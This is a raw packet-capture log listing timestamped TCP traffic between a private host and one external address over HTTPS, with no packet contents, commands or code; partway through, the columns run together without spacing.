Sep 26, 2024 10:55:31.115272999 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.115344048 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.115442991 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.119340897 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.119407892 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.119436979 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.119458914 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.119484901 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.119592905 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.197149038 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.197211981 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.197257996 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.197339058 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.197380066 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.197402954 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.197524071 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.197577953 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.197602034 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.197616100 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.197644949 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.197662115 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.198167086 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.198215008 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.198244095 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.198256969 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.198285103 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.198301077 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.198777914 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.198822975 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.198852062 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.198863983 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.198889971 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.198909044 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.199662924 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.199706078 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.199738026 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.199749947 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.199776888 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.199795008 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.199930906 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.199980974 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.200016975 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.200028896 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.200059891 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.200077057 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.200185061 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.200226068 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.200261116 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.200273037 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.200299978 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.200321913 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.206208944 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.206259966 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.206295013 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.206306934 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.206336975 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.206356049 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.284091949 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.284138918 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.284173965 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.284195900 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.284219027 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.284635067 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.284683943 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.284708023 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.284729958 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.284743071 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.285314083 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.285355091 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.285379887 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.285396099 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.285423040 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.285443068 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.285952091 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.285994053 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.286014080 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.286026955 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.286055088 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.286072969 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.286680937 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.286724091 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.286748886 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.286761045 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.286803961 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.286803961 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.286894083 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.286936998 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.286961079 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.286989927 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.287015915 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.287034035 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.287548065 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.287590981 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.287611008 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.287622929 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.287648916 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.287666082 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.339301109 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.339349031 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.339380026 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.339421034 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.339451075 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.340548038 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.371239901 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.371284008 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.371341944 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.371357918 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.371404886 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.371404886 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.371721029 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.371763945 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.371789932 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.371802092 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.371829987 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.371845961 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.372389078 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.372433901 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.372466087 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.372478008 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.372500896 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.373033047 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.373095036 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.373105049 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.373123884 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.373157978 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.373177052 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.373270988 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.373325109 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.373342037 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.373354912 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.373384953 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.373403072 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.373955965 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.374001980 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.374038935 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.374052048 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.374075890 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.374562025 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.374610901 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.374627113 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.374640942 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.374666929 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.374706984 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.426701069 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.426759005 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.426867008 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.426882982 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.426915884 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.426945925 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.657360077 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.657387972 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.657445908 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.657464981 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.657488108 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.657500029 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.657555103 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.657581091 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.657614946 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.657619953 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.657641888 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.657666922 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.658262014 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.658282042 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.658338070 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.658341885 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.658385038 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.658404112 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.658411980 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.658452034 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.658456087 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.658493042 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.658544064 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.658912897 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:36.481318951 CEST  49744     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:36.481370926 CEST  443       49744     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:36.481478930 CEST  49744     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:36.484091997 CEST  49744     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:36.484106064 CEST  443       49744     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:36.987246037 CEST  443       49744     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:36.987338066 CEST  49744     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:36.989229918 CEST  49744     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:36.989244938 CEST  443       49744     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:36.989619017 CEST  443       49744     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:36.995317936 CEST  49744     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:37.039400101 CEST  443       49744     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:37.142721891 CEST  443       49744     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:37.143068075 CEST  443       49744     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:37.143090010 CEST  443       49744     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:37.143121004 CEST  443       49744     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:37.143136978 CEST  49744     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:37.143151045 CEST  443       49744     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:37.143168926 CEST  49744     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:37.143184900 CEST  49744     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:37.143189907 CEST  443       49744     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:37.143261909 CEST  443       49744     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:37.143321991 CEST  49744     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:37.143621922 CEST  49744     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:37.238909960 CEST  49745     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:37.239008904 CEST  443       49745     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:37.239224911 CEST  49745     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:37.239653111 CEST  49745     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:37.239690065 CEST  443       49745     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:37.746689081 CEST  443       49745     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:37.746782064 CEST  49745     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:37.747904062 CEST  49745     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:37.747932911 CEST  443       49745     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:37.748398066 CEST  443       49745     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:37.749207020 CEST  49745     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:37.791445971 CEST  443       49745     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:37.895730972 CEST  443       49745     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:37.905441046 CEST  443       49745     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:37.905462980 CEST  443       49745     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:37.905534983 CEST  49745     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:37.905599117 CEST  443       49745     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:37.905677080 CEST  49745     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:37.983921051 CEST  443       49745     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:37.983968973 CEST  443       49745     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:37.984006882 CEST  49745     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:37.984031916 CEST  443       49745     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:37.984085083 CEST  49745     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:37.984085083 CEST  49745     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:37.991508007 CEST  443       49745     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:37.991554976 CEST  443       49745     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:37.991592884 CEST  49745     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:37.991606951 CEST  443       49745     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:37.991633892 CEST  49745     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:37.991651058 CEST  49745     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:38.068550110 CEST  443       49745     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:38.068655968 CEST  49745     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:38.068698883 CEST  443       49745     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:38.068829060 CEST  443       49745     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:38.068876028 CEST  49745     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:38.068902969 CEST  49745     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:38.069964886 CEST  49746     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:38.069998980 CEST  443       49746     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:38.070085049 CEST  49746     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:38.070280075 CEST  49746     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:38.070292950 CEST  443       49746     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:38.543684959 CEST  443       49746     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:38.549771070 CEST  49746     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:38.549796104 CEST  443       49746     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:38.692864895 CEST  443       49746     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:38.778805017 CEST  443       49746     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:38.778855085 CEST  443       49746     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:38.778901100 CEST  49746     443       192.168.2.4    15.235.85.194
                                  Sep 26, 2024 10:55:38.778990984 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.779031992 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.779040098 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.779092073 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.780353069 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.780402899 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.780420065 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.780422926 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.780442953 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.780457973 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.780469894 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.780483007 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.780508041 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.788710117 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.788749933 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.788780928 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.788803101 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.788834095 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.865267992 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.865317106 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.865355015 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.865427017 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.865463972 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.867032051 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.867072105 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.867086887 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.867106915 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.867110968 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.867134094 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.867160082 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.867185116 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.868885994 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.868962049 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.868980885 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.869014978 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.869085073 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.869116068 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.919889927 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.919939995 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.919989109 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.920013905 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.920042992 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.954014063 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.954040051 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.954091072 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.954113007 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.954114914 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.954178095 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.954215050 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.954215050 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.954215050 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.955319881 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.955358028 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.955399990 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.955405951 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.955432892 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.955465078 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.955518961 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.956223011 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.956268072 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.956331015 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.956347942 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.956372023 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.957329035 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.957376957 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.957401037 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.957413912 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.957443953 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.958539009 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.958578110 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.958674908 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.958689928 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.958734989 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.963577032 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.963623047 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.963643074 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:38.963655949 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:38.963687897 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.036792994 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.036842108 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.036873102 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.036931038 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.036959887 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.037312984 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.037369967 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.037386894 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.037400961 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.037424088 CEST4434974615.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:39.037447929 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.037448883 CEST49746443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:39.037929058 CEST4434974615.235.85.194192.168.2.4
